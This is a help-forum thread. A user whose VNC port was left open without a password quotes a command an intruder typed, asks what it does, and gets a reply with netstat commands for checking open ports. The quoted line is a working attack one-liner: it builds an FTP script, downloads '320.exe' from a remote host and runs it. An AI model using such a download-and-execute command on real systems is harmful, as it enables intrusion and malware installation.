Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works

Unauthorized VNC access;Tried to execute script

  • Please log in to reply



    New Member

  • Member
  • Pip
  • 1 posts

I am running on a PentiumM, 1.8G laptop, WinXP 5.1, SP2 with all updates. I have a router/firewall, and opened up the VNC ports for someone to view my computer. Unfortunately, I removed the password to make it easier for our customer. Within 10 minutes after our session and before I closed up the port, I see strange activity on my computer and realize someone else jumped on. They opened up the start>run and tried to execute the following line:

cmd.exe /c del i&echo open 17313 > i&echo user 1 1 >> i &echo get 320.exe >> i &echo quit >> i &ftp -n -s:i &320.exe&del i&exit

Whois results in OrgName: Conway Corporation
Traceroute dhcp37-239.cable.conwaycorp.net.

I think I closed down the dos window and port in time, but am not sure.

The above line looks to be getting my pc to download a file from them and then execute it. I am guessing bad things would then happen.

So, can someone let me know the following:

1. What does this do?
2. Should I report this to anyone? Conway Corp?

To me, this is a big deal considering they detected my open port within 15 minutes so they are probing vnc ports and given what I could have lost depending on their next actions. I can get only so much satisfaction by pinging their computer...

And yes, I know the correct answer is to not open up VNC ever again without a password. Lesson learned! To be safe, I backed up my laptop and am now running through your spyware/virus programs to clean up anything.

Thanks for any assistance. I appreciate all of the help from this site and use it often.
  • 0





  • Member
  • PipPip
  • 80 posts
Try running this test

Finding out what Ports are open

TO find out what ports are open/exposed do the following

Start >Run >type "cmd" {enter}
At the command line type "netstat -a" {enter}

The list displayed shows "Listening ports" and established "Who is on the other end" connections to yout computer.

This is a list of common Trojan/Backdoor Port numbers

Who is listening? Use this syntax: netstat -an |find /i "listening"
Save who is listening to a text file: netstat -an |find /i "listening" > c:\openports.txt
Who is established? Use this syntax: netstat -an |find /i "established"

Note: In Windows XP, you can type NETSTAT -O to get a list of all the owning process ID associated with each connection: netstat -ao |find /i "listening"

  • 0

Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP